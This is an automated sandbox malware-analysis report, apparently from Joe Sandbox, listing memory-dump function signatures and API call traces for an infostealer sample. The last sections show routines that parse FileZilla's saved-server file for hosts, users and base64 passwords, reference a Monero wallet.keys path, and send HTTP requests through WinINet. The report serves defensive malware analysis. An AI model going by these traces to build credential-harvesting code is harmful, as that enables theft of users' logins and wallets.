                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: eJCd
                                • API String ID: 0-3241830844
                                • Opcode ID: 7305b82d23659e22ed6fbfdb0df6619e352dff73ac79ea2abcf0e1d66fcb0582
                                • Instruction ID: 55e06c90d15b8c670d0626521235e47caf3460be04ac76e42ee0e7bd60abaf46
                                • Opcode Fuzzy Hash: 7305b82d23659e22ed6fbfdb0df6619e352dff73ac79ea2abcf0e1d66fcb0582
                                • Instruction Fuzzy Hash: F36148B3E183109BE3545E29DC8577AF7D2EBD4320F1B8A3CDAC897784D93A58058746
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8}
                                • API String ID: 0-4209514861
                                • Opcode ID: 1056d9fadf5e927a594aadcefcb6516a45dc82602745adf6500bf813dd74f389
                                • Instruction ID: 9926a79a226fab294187a3b2fbe61985035ae7b868cc911641059e76aedab496
                                • Opcode Fuzzy Hash: 1056d9fadf5e927a594aadcefcb6516a45dc82602745adf6500bf813dd74f389
                                • Instruction Fuzzy Hash: 1B61F6B3A082149FE3146E29EC84B7AFBD9EBD4720F1A453DE6D883340E6355C11C796
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A~=n
                                • API String ID: 0-2623644159
                                • Opcode ID: 7521d71c5d6e54a052530588510b1921d4961d4d9b5baf4083b40158b564d648
                                • Instruction ID: 3c06525c21bc8fef4c74766c07f361bad20f49dc514c335a9c9e67353eb5c9f4
                                • Opcode Fuzzy Hash: 7521d71c5d6e54a052530588510b1921d4961d4d9b5baf4083b40158b564d648
                                • Instruction Fuzzy Hash: B1412BB3A093109BF3046E2DEC8576BBBE6EBC4720F5B853ED6C493744D93518058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ]cJ
                                • API String ID: 0-1480337199
                                • Opcode ID: 4e6eba61236bbb2a9d3202cff86abdc2e323094836426fde3bdffd09131bc711
                                • Instruction ID: 70d05658720157628049f017c9b4f44d9f9b0591c58700e1c8629cc3115c2f1b
                                • Opcode Fuzzy Hash: 4e6eba61236bbb2a9d3202cff86abdc2e323094836426fde3bdffd09131bc711
                                • Instruction Fuzzy Hash: CC31C1B3A086014BF3546A2DDC9633AB7D6EB98310F2A453DDA85C3784E93D98158686
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a089b7998997d075b0bf3483417c3d7e9a55e9ae3e842e6b73c8f5728bc912c3
                                • Instruction ID: 9c366995498afc5ca5abd1692e3ce8df90570f44c615bbe5de4cdc083df15a0e
                                • Opcode Fuzzy Hash: a089b7998997d075b0bf3483417c3d7e9a55e9ae3e842e6b73c8f5728bc912c3
                                • Instruction Fuzzy Hash: 505107F3E086105FE3046E29DC8576ABBE5EFE4720F1B463DDAC893780E63958458792
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c7b18766e35e678902ff0467660c40ac1ad2f3b3d2641695c43e2f5b0b03ee8c
                                • Instruction ID: 3731d6e8428536077734fe5ac5277e39a1563f8fbc79db679e0fb172b4b6a840
                                • Opcode Fuzzy Hash: c7b18766e35e678902ff0467660c40ac1ad2f3b3d2641695c43e2f5b0b03ee8c
                                • Instruction Fuzzy Hash: 114149F3E086205BF7046D29DC457BA7B95DF94360F2A823DEA8447B84E935580582D6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 07aef4ad542c2594994fa388a4975a5047db200da3f166b8ec2cce1b2ebdddb4
                                • Instruction ID: 1cbdc57a0a6a9a178961c5e0ce3fd564f8b0e1a6f4ee1df5c5364a74164b2907
                                • Opcode Fuzzy Hash: 07aef4ad542c2594994fa388a4975a5047db200da3f166b8ec2cce1b2ebdddb4
                                • Instruction Fuzzy Hash: BF4126F3E181005FE704AE3DEC5477AB6D6DBD4320F1A853DEA8497788E9355D0982C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 933f209b241c93457886066c43a1e3ba2a1eb8582a5be3c066c3d6bf28ae7e49
                                • Instruction ID: 5564cc6dd9e149f75ba6d198c65587aa63fd2baa74f144e5ee3b7411052bccd9
                                • Opcode Fuzzy Hash: 933f209b241c93457886066c43a1e3ba2a1eb8582a5be3c066c3d6bf28ae7e49
                                • Instruction Fuzzy Hash: CE4136B211C700DFE355AF69E88277AFBE5FF58310F16482DE6D182610E67994408B9B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,000A0DBA,000A0DB7,000A0DB6,000A0DB3), ref: 00090362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00090369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00090385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 000903CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 000903DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00090419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00090463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00090562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00090571
                                • lstrcat.KERNEL32(?,url: ), ref: 00090580
                                • lstrcat.KERNEL32(?,00000000), ref: 00090593
                                • lstrcat.KERNEL32(?,000A1678), ref: 000905A2
                                • lstrcat.KERNEL32(?,00000000), ref: 000905B5
                                • lstrcat.KERNEL32(?,000A167C), ref: 000905C4
                                • lstrcat.KERNEL32(?,login: ), ref: 000905D3
                                • lstrcat.KERNEL32(?,00000000), ref: 000905E6
                                • lstrcat.KERNEL32(?,000A1688), ref: 000905F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00090604
                                • lstrcat.KERNEL32(?,00000000), ref: 00090617
                                • lstrcat.KERNEL32(?,000A1698), ref: 00090626
                                • lstrcat.KERNEL32(?,000A169C), ref: 00090635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: eb96d52a28a8eefa345e64bc6953f8846394a8920546d4d0030cb9399acacb74
                                • Instruction ID: 62e6502b88ec35b5110ab1ab66b584c9a03d002814211888ec52b45d5df5fce4
                                • Opcode Fuzzy Hash: eb96d52a28a8eefa345e64bc6953f8846394a8920546d4d0030cb9399acacb74
                                • Instruction Fuzzy Hash: 70D12271A10108ABCF04FBF4DD9AEEEB378BF55300F544518F102A6092DF74AA09DBA2
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000859F8
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 00085A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00085B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D0F2C8,00000000,?,00D0E5C0,00000000,?,000A1A1C), ref: 00085E71
                                • lstrlen.KERNEL32(00000000), ref: 00085E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00085E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00085E9A
                                • lstrlen.KERNEL32(00000000), ref: 00085EAF
                                • lstrlen.KERNEL32(00000000), ref: 00085ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00085EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00085F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00085F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00085F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00085FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00085FBD
                                • HttpOpenRequestA.WININET(00000000,00D0F3A8,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00085BF8
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • InternetCloseHandle.WININET(00000000), ref: 00085FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
